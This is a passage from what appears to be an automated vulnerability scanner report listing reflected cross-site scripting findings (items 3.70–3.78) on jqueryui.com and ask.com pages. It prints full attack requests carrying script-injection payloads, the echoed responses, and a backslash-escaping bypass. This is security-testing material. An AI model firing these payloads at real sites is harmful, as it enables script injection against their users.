GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=1008712f"><script>alert(1)</script>835a86cc92c&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
conColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=1008712f"><script>alert(1)</script>835a86cc92c&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.70. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc910"><script>alert(1)</script>7e405cdb2cd was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2pxfc910"><script>alert(1)</script>7e405cdb2cd&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2pxfc910"><script>alert(1)</script>7e405cdb2cd&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.71. http://ss.ask.com/query [fn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ss.ask.com
Path:   /query

Issue detail

The value of the fn request parameter is copied into the HTML document as plain text between tags. The payload 35a86<script>alert(1)</script>8f46cab7f1f was submitted in the fn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /query?sstype=prefix&fn=searchSuggestion35a86<script>alert(1)</script>8f46cab7f1f&q=re&limit=8&timestamp=1296155610067 HTTP/1.1
Host: ss.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:34:13 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 611
Content-Type: text/javascript

searchSuggestion35a86<script>alert(1)</script>8f46cab7f1f(["re",
["<span class=\\\"suggest\\\">re</span>d jacket firearms","<span class=\\\"suggest\\\">re</span>ed hastings","<span class=\\\"suggest\
...[SNIP]...

3.72. http://ss.ask.com/query [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ss.ask.com
Path:   /query

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload cb349<script>alert(1)</script>6fcc1d3815a was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /query?sstype=prefix&fn=searchSuggestion&q=recb349<script>alert(1)</script>6fcc1d3815a&limit=8&timestamp=1296155610067 HTTP/1.1
Host: ss.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:34:19 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 71
Content-Type: text/javascript

searchSuggestion(["recb349<script>alert(1)</script>6fcc1d3815a",
[]]);

3.73. http://www.ask.com/ans [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ans

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75dda'%3balert(1)//6d6e34d3af8 was submitted in the l parameter. This input was echoed as 75dda';alert(1)//6d6e34d3af8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ans?qsrc=&o=0&l=dir75dda'%3balert(1)//6d6e34d3af8&q=regulator+boat HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:47:36 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir75dda';alert(1)//6d6e34d3af8"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ3OjM2LVVUQw%3D%3D&po=0&pp=dir75dda%27%3Balert%281%29%2F%2F6d6e34d3af8; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:36 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:36 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:36 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 173673


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>
<head>


<title>



...[SNIP]...
<script type="text/javascript">
var qstr = 'q=regulator+boat&o=0&l=dir75dda';alert(1)//6d6e34d3af8&jss=1';
window.location = 'http://www.ask.com/ans?'+ qstr;
</script>
...[SNIP]...

3.74. http://www.ask.com/pictures [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1afd7'%3balert(1)//178827696e9 was submitted in the l parameter. This input was echoed as 1afd7';alert(1)//178827696e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictures?qsrc=167&o=0&l=dir1afd7'%3balert(1)//178827696e9&q=regulator+boat&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:36 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir1afd7';alert(1)//178827696e9"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjM2LVVUQw%3D%3D&po=0&pp=dir1afd7%27%3Balert%281%29%2F%2F178827696e9; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:36 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:36 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 123748


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...



var _matchUrl = '/afc-match?q=regulator+boat&page=1&ac=1082&qid=AE64B4C82E8A9CAB1E99DED66206DAB7&qsrc=167&dm=all&qrt=2&lid=5490&o=0&l=dir1afd7';alert(1)//178827696e9';


_matchUrl+= "&userip=173.193.214.243";


_matchUrl+="&losid=a&locid=p&lodid=us";


...[SNIP]...

3.75. http://www.ask.com/pictures [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef4cb\'%3b4d01c24067b was submitted in the q parameter. This input was echoed as ef4cb\\';4d01c24067b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /pictures?qsrc=167&o=0&l=dir&q=regulator+boatef4cb\'%3b4d01c24067b&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:52 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:52 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:52 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 59101


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
';
google_language = '';
google_country = '';
google_encoding = 'utf8';
google_safe = 'high';
google_adtest = 'off';
google_hints = 'regulator boatef4cb\\';4d01c24067b';
google_kw = 'regulator boatef4cb\\';4d01c24067b';
google_kw_type = 'broad';

var oScript = document.getElementById('bannerAd_ctrScript');

oScript.setAttribute(
...[SNIP]...

3.76. http://www.ask.com/pictureslanding [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a2ff'%3balert(1)//060dbcc8357 was submitted in the l parameter. This input was echoed as 2a2ff';alert(1)//060dbcc8357 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictureslanding?o=0&l=dir2a2ff'%3balert(1)//060dbcc8357 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:26 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir2a2ff';alert(1)//060dbcc8357"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjI2LVVUQw%3D%3D&po=0&pp=dir2a2ff%27%3Balert%281%29%2F%2F060dbcc8357; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
Content-Length: 58641


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<tit
...[SNIP]...



var _matchUrl = '/afc-match?q=&page=1&ac=24&qid=A85CEC08BA14E9370EACEFB56AB8D916&qsrc=121&dm=all&qrt=2&lid=&o=0&l=dir2a2ff';alert(1)//060dbcc8357';


_matchUrl+= "&userip=173.193.214.243";


_matchUrl+= "&wzinfo=no";



...[SNIP]...

3.77. http://www.ask.com/web [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c1c7\'%3bfb820ccc7e7 was submitted in the q parameter. This input was echoed as 8c1c7\\';fb820ccc7e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /web?q=Is+there+lead+in+reusable+grocery+bags%3F8c1c7\'%3bfb820ccc7e7&gc=1&qsrc=3066&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:14:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: gcc=U2hvcHBpbmcvQXJ0c19hbmRfRW50ZXJ0YWlubWVudC9BcnRzX2FuZF9DcmFmdHNfU3VwcGxpZXM.; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:14:33 GMT; Path=/
Set-Cookie: clc=U2hvcHBpbmcvQXJ0c19hbmRfRW50ZXJ0YWlubWVudC9BcnRzX2FuZF9DcmFmdHNfU3VwcGxpZXM.; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:14:33 GMT; Path=/
Set-Cookie: ldst=sorg=-1|1296155673227; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:14:33 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-SXMrdGhlcmUrbGVhZCtpbityZXVzYWJsZStncm9jZXJ5K2JhZ3MlM0Y4YzFjNyU1QyUyNyUzQmZiODIwY2NjN2U3; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE0OjMzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Content-Length: 78834


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - Wha
...[SNIP]...
e = 'medium';
google_adtest = 'off';

google_ad_section = 'default';

google_page_url = '';


google_hints = 'Is there lead in reusable grocery bags?8c1c7\\';fb820ccc7e7';
google_kw = '';


google_kw_type = 'broad';

}else{

google_ad_client = 'aj-cat';
google_ad_channel = 'hobbies_and_activities-craft
...[SNIP]...

3.78. http://www.ask.com/web [qid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

